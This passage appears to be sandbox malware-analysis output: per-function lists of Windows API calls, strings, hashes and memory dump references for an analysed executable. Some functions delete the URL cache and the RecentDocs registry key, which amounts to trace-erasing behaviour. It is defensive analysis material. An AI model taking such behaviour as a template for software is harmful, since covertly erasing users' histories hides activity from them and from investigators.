                                                                                              • Instruction Fuzzy Hash: 7B112A713E1751B7F82A7B268C53F2E211B9BC4F14F01411AF7012F2D3CAE9E9828689
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32 ref: 00405710
                                                                                              • IUnknown_Release_Proxy.RPCRT4(?), ref: 0040572B
                                                                                              • GetWindowsDirectoryA.KERNEL32(00000001,00000104), ref: 00405739
                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000022,00000000), ref: 00405780
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryFolderInstancePathProxyRelease_SpecialUnknown_Windows
                                                                                              • String ID: \History
                                                                                              • API String ID: 3119684454-314617673
                                                                                              • Opcode ID: 3390bc1eba11084a4cc8e2fd908aad4860485e771c45de15bcf9dbbf2a06d188
                                                                                              • Instruction ID: 900f256215fbccf07109669abd3ee6d43b988d0dfea6ae5773aeef7301ea0bc3
                                                                                              • Opcode Fuzzy Hash: 3390bc1eba11084a4cc8e2fd908aad4860485e771c45de15bcf9dbbf2a06d188
                                                                                              • Instruction Fuzzy Hash: 03216274204741ABD710DF54DC45FAAB7A9EB85B00F00496EF5849B2C0D7B49845CFAA
                                                                                              APIs
                                                                                                • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                                                                                • Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                                                                              • CoInitializeEx.COMBASE ref: 0042BAFA
                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0042BB26
                                                                                                • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                                                                              Strings
                                                                                              • Security initialization failed, xrefs: 0042BB36
                                                                                              • COM initialization failed, xrefs: 0042BB08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize$CallbackDispatcherItemMessageSecurityUser
                                                                                              • String ID: COM initialization failed$Security initialization failed
                                                                                              • API String ID: 2763255498-2019830807
                                                                                              • Opcode ID: 0e0c895b859989d438ab38e8a594c5872f6e606db4c1caacad3cf4da41e47cf0
                                                                                              • Instruction ID: f88cc46181f4dfbc0f249d786d5360bfa143289b16b194d71d3c30d2b60c04a5
                                                                                              • Opcode Fuzzy Hash: 0e0c895b859989d438ab38e8a594c5872f6e606db4c1caacad3cf4da41e47cf0
                                                                                              • Instruction Fuzzy Hash: A001AD303D8B107AFA623632BD27F5C11856B50F26F60002FF606AE2D2DFDC6945828E
                                                                                              APIs
                                                                                              • FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 00401237
                                                                                              • FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 0040124F
                                                                                              • DeleteUrlCacheEntry.WININET(?), ref: 00401287
                                                                                              • FindNextUrlCacheEntryA.WININET ref: 0040129D
                                                                                              • FindNextUrlCacheEntryA.WININET(00000000,00000000,?), ref: 004012BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: CacheEntry$Find$FirstNext$Delete
                                                                                              • String ID:
                                                                                              • API String ID: 3251259003-0
                                                                                              • Opcode ID: 89f70f0e96486f4d92bd3eeb09e83cf657234353214fdc9808606fbe77fdbd33
                                                                                              • Instruction ID: 988728bd11fdbca91c0b550d98239d6b5543920a559e34b5b42614616c157492
                                                                                              • Opcode Fuzzy Hash: 89f70f0e96486f4d92bd3eeb09e83cf657234353214fdc9808606fbe77fdbd33
                                                                                              • Instruction Fuzzy Hash: 3A11C3B2505305AFD220EF959C84E6BB3DC9F98354F04482EF945A2291D778DC088BAA
                                                                                              APIs
                                                                                              • GetVolumeInformationA.KERNEL32(?,?,00000018,?,?,?), ref: 0042CE96
                                                                                                • Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prologInformationVolume
                                                                                              • String ID: %04X-%04X$C:\$disk error!
                                                                                              • API String ID: 1258155637-399326531
                                                                                              • Opcode ID: 6e15fd504c8c54dca98ca61168ccc2a65f08a8b0f6c50412227ce20cc2e1a098
                                                                                              • Instruction ID: cae5146e5efa9b00dd1fefc34af0bd2d153fb86159491f6109f916f967ad882e
                                                                                              • Opcode Fuzzy Hash: 6e15fd504c8c54dca98ca61168ccc2a65f08a8b0f6c50412227ce20cc2e1a098
                                                                                              • Instruction Fuzzy Hash: 8B31AD71204741AFC304DB68C845F5FBBA4AB85714F408A1EF1A6872D1DBB89509CB9A
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0045FBB1
                                                                                              • PathFindExtensionA.SHLWAPI(?), ref: 0045FBC8
                                                                                              • lstrcpyA.KERNEL32(00000000,?), ref: 0045FBF2
                                                                                                • Part of subcall function 0045F8A9: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0045F8CC
                                                                                                • Part of subcall function 0045F8A9: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0045F8D7
                                                                                                • Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(?), ref: 0045F908
                                                                                                • Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(?), ref: 0045F910
                                                                                                • Part of subcall function 0045F8A9: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0045F91D
                                                                                                • Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(?), ref: 0045F937
                                                                                                • Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0045F93D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                                              • String ID: %s.dll
                                                                                              • API String ID: 4178508759-3668843792
                                                                                              • Opcode ID: 3e24a30a05569ae7f589b37ec69413717422cff000f7d417d5ba677a669868ee
                                                                                              • Instruction ID: cc2ed34eadf9b4ba29d8b30092525c1cfbb258b8e0cff2dfd049ffe264f0ed61
                                                                                              • Opcode Fuzzy Hash: 3e24a30a05569ae7f589b37ec69413717422cff000f7d417d5ba677a669868ee
                                                                                              • Instruction Fuzzy Hash: D60188B1D0010CABCB15EFA5DC959EE77BDFB48305F0405BAEE06D3101E6B49A4D8B55
                                                                                              APIs
                                                                                              • IsWindow.USER32(000103F6), ref: 0043CC46
                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 0043CC76
                                                                                                • Part of subcall function 00456E8B: GetClassInfoA.USER32(?,-0000007C,?), ref: 00456EEA
                                                                                              • SetWindowLongA.USER32(000103F6,000000FC,0043C820), ref: 0043CCA2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClassCursorInfoLoadLong
                                                                                              • String ID: (sM
                                                                                              • API String ID: 2858387636-3311458642
                                                                                              • Opcode ID: a7090532f8098ed2090d6412a7391523968236a1261bc1cd6769e82e2ec294ec
                                                                                              • Instruction ID: ef079a07a27ee7e5d70a19a55713efbde82861f97534fe9ab6d3067533c054b6
                                                                                              • Opcode Fuzzy Hash: a7090532f8098ed2090d6412a7391523968236a1261bc1cd6769e82e2ec294ec
                                                                                              • Instruction Fuzzy Hash: C3F05E70389310BBE31467A0AC5AF1A22199B44B45F20513FFF06BA2E5EAA86800C79D
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,004D5904,00000000,00000001,?), ref: 0045FAC8
                                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 0045FAE8
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0045FB2C
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0045FB42
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$OpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 1607946009-0
                                                                                              • Opcode ID: 91043f04f9318fac727f71e0db06273f86fabba98528094b445e4c7aa36c70e2
                                                                                              • Instruction ID: ef4cf7c31f733ac53fc8ca2d79e85ee5050cdb63d3cced5bf84dc23dad16bdee
                                                                                              • Opcode Fuzzy Hash: 91043f04f9318fac727f71e0db06273f86fabba98528094b445e4c7aa36c70e2
                                                                                              • Instruction Fuzzy Hash: A8216DB1D00208EFDB21CF85D855AAEFBB8EF90315F1040BBE905A6211D3746A08CF66
                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00455C9F
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00455CA7
                                                                                              • LockResource.KERNEL32(00000000), ref: 00455CB9
                                                                                              • FreeResource.KERNEL32(00000000), ref: 00455D03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindFreeLoadLock
                                                                                              • String ID:
                                                                                              • API String ID: 1078018258-0
                                                                                              • Opcode ID: 6af024dde24d29818a3f4c707ec0df0eb2a57cca12f1b9fef02d98814a47c105
                                                                                              • Instruction ID: a5e2a00811957388d8ef0ec10edfa5231714503df0fa2ad57628587c981f475f
                                                                                              • Opcode Fuzzy Hash: 6af024dde24d29818a3f4c707ec0df0eb2a57cca12f1b9fef02d98814a47c105
                                                                                              • Instruction Fuzzy Hash: 7B11913A500F05EFC7219F64D958AABB7B4FF04756F00802AEC4253751E3B8AC48DB54
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(?), ref: 0045D96B
                                                                                              • GetWindowTextA.USER32(?,?,00000100), ref: 0045D987
                                                                                              • lstrcmpA.KERNEL32(?,?), ref: 0045D99B
                                                                                              • SetWindowTextA.USER32(?,?), ref: 0045D9AB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: TextWindow$lstrcmplstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 330964273-0
                                                                                              • Opcode ID: 723314ce92d9a9a6c7fa22a0811cb053bfc38c175d037d9aceb4dfb7d1b4b655
                                                                                              • Instruction ID: bcf724bac57874a173b33d79688deb67c16571129e900e4812eadd9e8c43e4f8
                                                                                              • Opcode Fuzzy Hash: 723314ce92d9a9a6c7fa22a0811cb053bfc38c175d037d9aceb4dfb7d1b4b655
                                                                                              • Instruction Fuzzy Hash: DAF01DB5901118ABDF21AF64DD489CE7B79EF08355F0040A2FD45E6220E774CA94DB9A
                                                                                              APIs
                                                                                              • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 0043CE22
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 0043CE38
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFontIndirectInfoParametersSystem
                                                                                              • String ID: xsM
                                                                                              • API String ID: 3898911155-2849830882
                                                                                              • Opcode ID: 294213541f4df0dd98909d1590b6c0f9666c8c3f3db484b2e6d3c5be98dcea8c
                                                                                              • Instruction ID: f5a41c1656a517e53d87a5575b5162294697ca63d823790e3c27869578f867cc
                                                                                              • Opcode Fuzzy Hash: 294213541f4df0dd98909d1590b6c0f9666c8c3f3db484b2e6d3c5be98dcea8c
                                                                                              • Instruction Fuzzy Hash: 9E215C71504780DFD325DF29D8057DABBE8FF88714F008A2FE48A87251DBB89404CB56
                                                                                              APIs
                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,00000008,00000008,00000000), ref: 00405650
                                                                                              • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs), ref: 00405674
                                                                                                • Part of subcall function 00405260: FindFirstFileA.KERNEL32(?,?,\*.*,00000004,?,?), ref: 0040530E
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs, xrefs: 0040566A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFileFindFirstFolderPathSpecial
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
                                                                                              • API String ID: 1374875820-3036595939
                                                                                              • Opcode ID: 3fba9971ef62013d3833a1864c1ae7c2acc93c511651f1d626164a0a82a318e4
                                                                                              • Instruction ID: 659d51f54426914620f0ef7ac8131a6f5e17d26cd5e287e3669eafa29438ce9a
                                                                                              • Opcode Fuzzy Hash: 3fba9971ef62013d3833a1864c1ae7c2acc93c511651f1d626164a0a82a318e4
                                                                                              • Instruction Fuzzy Hash: 2FF03035244700AEE324A7109C06FEA7794AB54B10F44442DF985AA2C0EEF99484CB9B
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(0000B042), ref: 0045B1C6
                                                                                                • Part of subcall function 0045B051: __EH_prolog.LIBCMT ref: 0045B056
                                                                                                • Part of subcall function 0045B051: GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 0045B080
                                                                                                • Part of subcall function 0045B051: lstrcpynA.KERNEL32(?,?,00000104), ref: 0045B091
                                                                                              • CreateFileA.KERNEL32(0000B042,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,0000B042), ref: 0045B2DB
                                                                                              • GetLastError.KERNEL32 ref: 0045B2ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorFileFullH_prologLastNamePathlstrcpynlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 4207171074-0
                                                                                              • Opcode ID: a0ef4ab30a8c7bca15473b07d41fa31512ae2c4fa2b7c4a775cc0c152ee1711f
                                                                                              • Instruction ID: bc931f4a3eb57f992eb954223cc438830c3bf033075d61ebac5b1b5f474afd53
                                                                                              • Opcode Fuzzy Hash: a0ef4ab30a8c7bca15473b07d41fa31512ae2c4fa2b7c4a775cc0c152ee1711f
                                                                                              • Instruction Fuzzy Hash: F0413331600608ABEB108F25CC8A7EEB764EB04315F10C56BFD16D62D1CB7CC9898BA8
                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(00000000,?,00000006), ref: 004021CA
                                                                                                • Part of subcall function 00401180: LoadResource.KERNEL32(00000104,?,?,00000000,0040120C,?,00000000,?,?,00000006,00000000,?,0045A3DC,?,?,?), ref: 0040118C
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,0000007A,?,80070057), ref: 00402207
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,0000007A,?,80070057), ref: 00402245
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiResourceWide$FindLoad
                                                                                              • String ID:
                                                                                              • API String ID: 861045882-0
                                                                                              • Opcode ID: baa4575744bcffb4867a31880af86c8239e7816c7f4c7781bfc20bb34485b732
